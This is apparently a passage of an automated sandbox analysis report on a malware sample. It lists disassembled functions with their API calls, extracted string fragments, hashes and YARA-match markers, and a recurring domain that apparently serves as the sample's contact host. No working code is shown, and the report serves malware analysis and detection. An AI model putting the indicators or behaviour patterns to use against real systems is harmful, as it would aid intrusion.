                                                                                                                                                                                                              • Instruction Fuzzy Hash: FA32EAB160C7C58AD330CF54C541BDFBAF1EB82304F40882C86E96B656D676564ACB9B
                                                                                                                                                                                                              Function 024A7CD7 Relevance: 30.5, APIs: 8, Strings: 9, Instructions: 735memorycomCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CoCreateInstance.COMBASE(0044268C,00000000,00000001,0044267C,00000000), ref: 024A7F04
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(07B905B6), ref: 024A7F6C
                                                                                                                                                                                                              • CoSetProxyBlanket.COMBASE(CAF053BA,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 024A7FAA
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(A81AAA16), ref: 024A8012
                                                                                                                                                                                                              • SysAllocString.OLEAUT32(0ECC08BC), ref: 024A810F
                                                                                                                                                                                                              • VariantInit.OLEAUT32(A5A4ABB2), ref: 024A817D
                                                                                                                                                                                                              • SysFreeString.OLEAUT32(00000000), ref: 024A8460
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: String$Alloc$BlanketCreateFreeInitInstanceProxyVariant
                                                                                                                                                                                                              • String ID: $cB$0NuNup=Nu$C$\L$\L$nohi$v=$y>$}qrs
                                                                                                                                                                                                              • API String ID: 2895375541-2634092947
                                                                                                                                                                                                              • Opcode ID: c2609f97893d2c1803f8fe5fde3c74f9cabcd6b7b6990df772e235fedc787c8d
                                                                                                                                                                                                              • Instruction ID: ccb38b1a92cd8d9f48630331d34284e8718efb80350a1332817db4041764fed1
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c2609f97893d2c1803f8fe5fde3c74f9cabcd6b7b6990df772e235fedc787c8d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DD321171A083508FE714CF64C8A07ABBBE1EF95314F14892EEAD58B381D775D806CB92
                                                                                                                                                                                                              Function 024A7207 Relevance: 24.0, Strings: 19, Instructions: 300COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: &$)$*$,$,$/$4$4$5$5$6$6$:$=$>$@$J$P$ua9j
                                                                                                                                                                                                              • API String ID: 0-52748966
                                                                                                                                                                                                              • Opcode ID: c1e762d3af48749b96d384b74f206a085b68a3de8af0c071b0083f8698e44e81
                                                                                                                                                                                                              • Instruction ID: 356a5517de310472335e24858c34c347144c8a68cc0596da2c2f2d652a5d276d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c1e762d3af48749b96d384b74f206a085b68a3de8af0c071b0083f8698e44e81
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7A1F823A0C7914AE311857D8C5435FEED20BE2264F1ECA7ED8E5873C6D5A9C94AC393
                                                                                                                                                                                                              Function 02480DE1 Relevance: 21.8, APIs: 1, Strings: 11, Instructions: 785COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: +$0$0$S$X$Z$[$l$n$r$~
                                                                                                                                                                                                              • API String ID: 0-3752990600
                                                                                                                                                                                                              • Opcode ID: a34576c093be05ac0c5038eb556ea7266ae23b8e72f449edc15b644e9a618b67
                                                                                                                                                                                                              • Instruction ID: 89696e8b1df711bce4293e0dc9d60f4fb63a3453fc4308d71a1f06be18933059
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a34576c093be05ac0c5038eb556ea7266ae23b8e72f449edc15b644e9a618b67
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D362C37161C7908BC724AB78C4943AFBBD2ABC5324F098A2FD8ED973C1D6798545CB42
                                                                                                                                                                                                              Function 02490DA7 Relevance: 20.6, Strings: 16, Instructions: 641COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: !@$,$@$C$F$H$I$L$N$O$jW}U$jW}U$jW}U$jW}U$jW}U$jW}U
                                                                                                                                                                                                              • API String ID: 0-2791824542
                                                                                                                                                                                                              • Opcode ID: 9db8843992b55c1cb17a7b9b827edafdb53de372284d731034b217df3a49e305
                                                                                                                                                                                                              • Instruction ID: 1b1b0b36d559144b4931deae945ee9abbec430671ec061805758db7d4fa491ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9db8843992b55c1cb17a7b9b827edafdb53de372284d731034b217df3a49e305
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0732C57290C7918FD7248E38885436FBFE1AB85324F198A2EE5E9873D1D7798845CB42
                                                                                                                                                                                                              Function 02481976 Relevance: 19.8, APIs: 1, Strings: 10, Instructions: 516COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "$5$9$Z$Z$[$r$w$x$}
                                                                                                                                                                                                              • API String ID: 0-3241252022
                                                                                                                                                                                                              • Opcode ID: 3fe2c774c9f1f06418935f3364d584b81c27fc3cd392a2a600b0582d6ed36642
                                                                                                                                                                                                              • Instruction ID: 8a3a6366f8f3fff610fd014e39e07477d9640f0dd059e85a9a0ac5321bc6e3cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fe2c774c9f1f06418935f3364d584b81c27fc3cd392a2a600b0582d6ed36642
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3022837251D7908BC324EB38C4847AEBBE2ABC5314F194A2ED9ED87391D7748446CB53
                                                                                                                                                                                                              Function 0041F140 Relevance: 14.9, Strings: 11, Instructions: 1166COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: $%$8(0<$9><0$TU$eg$jZ$C\]$IK$MO$ga$R
                                                                                                                                                                                                              • API String ID: 0-846545573
                                                                                                                                                                                                              • Opcode ID: 8bb2329f87a14f332c6d7330e9e6ada747ffc48b48baef7dbaae7e351b90fae3
                                                                                                                                                                                                              • Instruction ID: 5d3eedd99ac0e596199279912e75a3a133570a47c7de0e85472f7a0d7e0bc302
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8bb2329f87a14f332c6d7330e9e6ada747ffc48b48baef7dbaae7e351b90fae3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F37259B1A183508BDB14CF24C8516ABB7F2FF86314F18852DE8958B391E739D946CB86
                                                                                                                                                                                                              Function 0249221E Relevance: 12.8, Strings: 10, Instructions: 292COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: #J'$%$'=:($7$.&$E?+=$YG$sputnik-1985.com$~$~q$z
                                                                                                                                                                                                              • API String ID: 0-1358222418
                                                                                                                                                                                                              • Opcode ID: 702a59d302c1116530107147cee97d891d9c03a5c2659a9b5a4b7e24383d73eb
                                                                                                                                                                                                              • Instruction ID: 72a68aaddfe182c622747af4288669b9f700dff121d49939d8e9bc5c662bf3ee
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 702a59d302c1116530107147cee97d891d9c03a5c2659a9b5a4b7e24383d73eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8EA1EFB050C3918FD325CF69949036BBFE1AFD2604F284A5DE4D28B361D3B5890ACB57
                                                                                                                                                                                                              Function 02479387 Relevance: 12.8, Strings: 10, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -$3Sp;$S$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
                                                                                                                                                                                                              • API String ID: 0-4152154003
                                                                                                                                                                                                              • Opcode ID: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction ID: 87c343c2430f097c8ddb1d33237bb21fcc29c40b4bade4b1daddee129ee65387
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5B61B17110C3D28ADB058F2984907BBFFE19F92248F1889AED4E59B343D729C50AC726
                                                                                                                                                                                                              Function 00409120 Relevance: 12.8, Strings: 10, Instructions: 267COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: -$3Sp;$S$cX?v$ndn-$q?Ga$srb~$uG[E$vfdk$|nzc
                                                                                                                                                                                                              • API String ID: 0-4152154003
                                                                                                                                                                                                              • Opcode ID: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction ID: d02e934ccce5eb6237b81fefe714ca6ff9b52d16efa86c836b1a3e521c3a79f5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac01069b87c025cb18cc27a78bcdb824729ac9b8eef9131abfd8a598ccf0bd0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B61C46010C3929ADB058F29845077BFFE19FD7344F1889AED4D59B383D739890ACB6A
                                                                                                                                                                                                              Function 00412200 Relevance: 11.4, APIs: 4, Strings: 1, Instructions: 2606COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                                                                                              • Opcode ID: ee10a088d06f2acfdc41d533f72017f8aeb69c1c695b7cc37e5ce4789daf93ef
                                                                                                                                                                                                              • Instruction ID: 3c4046a0b9695bfb11afeadce751921083c36bf3b0763603f2dd4dd0065a1b69
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ee10a088d06f2acfdc41d533f72017f8aeb69c1c695b7cc37e5ce4789daf93ef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D334871A087808FD714CF38C94539EBFF1AB56320F1982ADD4A99B3D2D7388985CB56
                                                                                                                                                                                                              Function 0248E2D7 Relevance: 10.8, Strings: 8, Instructions: 825COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: **34$3.*e$7$?296$Dzgy$F$pYFG$xueV
                                                                                                                                                                                                              • API String ID: 0-838960260
                                                                                                                                                                                                              • Opcode ID: 7b5a23d88bef89aa42c6c7e2d97bc4aa05bd0ce91f1722a88b522020c4ce9573
                                                                                                                                                                                                              • Instruction ID: 9fd603e2e2b6aa0c26cb5433d265e71d93f1beae47a811e198ea48cd575ad1f3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7b5a23d88bef89aa42c6c7e2d97bc4aa05bd0ce91f1722a88b522020c4ce9573
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 33522770A083909FD721DF29C85076FBBE1AF86214F08866EF8E95B392D775C506CB52
                                                                                                                                                                                                              Function 0041E070 Relevance: 10.8, Strings: 8, Instructions: 825COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: **34$3.*e$7$?296$Dzgy$F$pYFG$xueV
                                                                                                                                                                                                              • API String ID: 0-838960260
                                                                                                                                                                                                              • Opcode ID: 5f74e5b6dec745a83609f22ca2f56a0a01d893ce6f5bbfe61ed5e923aa15f220
                                                                                                                                                                                                              • Instruction ID: 1b09ee46c68ef75e254a9f2069ecba62510ae7922447996fa3a0c18055597dab
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f74e5b6dec745a83609f22ca2f56a0a01d893ce6f5bbfe61ed5e923aa15f220
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F0523B785083809FD721CF2AC8507AF7BE1AF95314F088A6DE8E94B392D739C945CB56
                                                                                                                                                                                                              Function 02478977 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 299threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 0247899B
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 024789A5
                                                                                                                                                                                                              • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 02478A89
                                                                                                                                                                                                              • GetForegroundWindow.USER32 ref: 02478B5C
                                                                                                                                                                                                                • Part of subcall function 0247B917: FreeLibrary.KERNEL32(02478CED), ref: 0247B91D
                                                                                                                                                                                                                • Part of subcall function 0247B917: FreeLibrary.KERNEL32 ref: 0247B93E
                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02478D06
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                              • String ID: iGr
                                                                                                                                                                                                              • API String ID: 3676751680-3172554082
                                                                                                                                                                                                              • Opcode ID: 11ce8ba3a4c19a5b35d693506ce6fb6d4eb679c5fc0eef1a5643f2739b34e622
                                                                                                                                                                                                              • Instruction ID: e05866eab949832b4608122dddc3602cdb32edbe7d74ad45c8d08c0c222f3f03
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11ce8ba3a4c19a5b35d693506ce6fb6d4eb679c5fc0eef1a5643f2739b34e622
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 319148B3F453144BC308AE69CD8536AF6C79BC4604F1EC63EA898DB794EAB8CC054685
                                                                                                                                                                                                              Function 02479A27 Relevance: 10.4, Strings: 8, Instructions: 380COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "'5F$%"$-R.U$4208$5FOLF4208$F$].I6$ua9j
                                                                                                                                                                                                              • API String ID: 0-1935212999
                                                                                                                                                                                                              • Opcode ID: e356e79c5344eb0c6bcb0294a4d958d93ef7a2b7ef09bca86de0a9b0b0fc969b
                                                                                                                                                                                                              • Instruction ID: e13efc57bea804829f417fdb94320699de724f6c6c8d5742eca6e49cbdee89c9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e356e79c5344eb0c6bcb0294a4d958d93ef7a2b7ef09bca86de0a9b0b0fc969b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1DC1257190C3808BD318DF25C891AABBBE6EFD2314F14496DE1E18B391DB39D50ACB56
                                                                                                                                                                                                              Function 0248A037 Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1279COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                                                              • String ID: c(<$klm"
                                                                                                                                                                                                              • API String ID: 3664257935-3870397272
                                                                                                                                                                                                              • Opcode ID: f126ca1394039353768ddbb2a0bd44d5613ce6596ce99bbbe4db0699ca61497d
                                                                                                                                                                                                              • Instruction ID: dce89a20c12713c4db367485f7c518052c867d0cf7514b553c8a8f39cc8728bf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f126ca1394039353768ddbb2a0bd44d5613ce6596ce99bbbe4db0699ca61497d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D8823376A183509BE725AB64C98072FBBE2EBD6714F18892FE5C547391D3B1DC01CB82
                                                                                                                                                                                                              Function 00419DD0 Relevance: 8.3, APIs: 2, Strings: 2, Instructions: 1279COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 0043CCE0: LdrInitializeThunk.NTDLL(0043FCC8,00000002,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043CD0E
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A396
                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?), ref: 0041A40B
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                              • String ID: c(<$klm"
                                                                                                                                                                                                              • API String ID: 764372645-3870397272
                                                                                                                                                                                                              • Opcode ID: c54e285572358bd89313a4c0e51078bbd4b6fa27cc39006ed57cb80208bafe1e
                                                                                                                                                                                                              • Instruction ID: 8852f5a1584a0137792711b757e7344c3d32d11c597e52e1262a824389947356
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c54e285572358bd89313a4c0e51078bbd4b6fa27cc39006ed57cb80208bafe1e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DC826876709340ABD725CB20C9807ABBBE2EBD6714F18852EE5C547352D379DC818B8B
                                                                                                                                                                                                              Function 004251A0 Relevance: 8.2, Strings: 6, Instructions: 715COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: %Z6H$M(V%$p;8=$PV$X^$\R
                                                                                                                                                                                                              • API String ID: 0-2985836343
                                                                                                                                                                                                              • Opcode ID: 12ef0418cdba3a95664b13f8bf3f10414aa0d138b8f648468d1cdeff6c3190f8
                                                                                                                                                                                                              • Instruction ID: d9a35c0def28b48a324d31e9828ef9e59a5d35539e87415f95941a3a94a46cba
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 12ef0418cdba3a95664b13f8bf3f10414aa0d138b8f648468d1cdeff6c3190f8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5325572A183108FD3108F29DC8176BB7E1FBC6314F99892EE5958B391E738D805CB86
                                                                                                                                                                                                              Function 02482467 Relevance: 7.9, APIs: 2, Strings: 1, Instructions: 2606COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: `
                                                                                                                                                                                                              • API String ID: 0-2679148245
                                                                                                                                                                                                              • Opcode ID: f20815b8bbc967e0d9116feff917ff8437694ae5196a9c6266201fae6c244416
                                                                                                                                                                                                              • Instruction ID: 67944b68661e0de65aaad7d5f64a7e046e44ae60d0c4bcde534d1e4f996f7b67
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f20815b8bbc967e0d9116feff917ff8437694ae5196a9c6266201fae6c244416
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF332471A087808FDB14DF78C84439EBFE2AF56320F0986AED4A99B3D1D3758945CB52
                                                                                                                                                                                                              Function 0247D8FA Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 291COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1532444918.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2470000_filename.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: 40c9366bdb580e3b69f2d8fa9c82c0fd58d661167f3280c808446744d7ea9f78
                                                                                                                                                                                                              • Instruction ID: 5620c47c904fcbe37e6affbba7953f6bbd3d6917915e7b2aad577a67bfbd47e8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 40c9366bdb580e3b69f2d8fa9c82c0fd58d661167f3280c808446744d7ea9f78
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7691B1B4618B82DFD3258F3AC590652BFE2BF973047198699C0E60BB51C379B416CB91
                                                                                                                                                                                                              Function 0040D9CD Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 286COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000000.00000002.1531801435.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000000.00000002.1531801435.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_filename.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Uninitialize
                                                                                                                                                                                                              • String ID: 45*$[<X2$sputnik-1985.com$zr
                                                                                                                                                                                                              • API String ID: 3861434553-549244510
                                                                                                                                                                                                              • Opcode ID: 4f4e8b165103d5ba1f171091541273358e781cb43d23f3817e1c9ed712beb87d
                                                                                                                                                                                                              • Instruction ID: bf0152d001b9ea5b1149188af91f79688cde84231b275a4fbc08da8dc0278ec6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4f4e8b165103d5ba1f171091541273358e781cb43d23f3817e1c9ed712beb87d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2E91D2B05087829FD315CF7AC590612BFF1BF97300B198699C0D61BB96C379B81ACB99
                                                                                                                                                                                                              Function 00418008 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 384COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
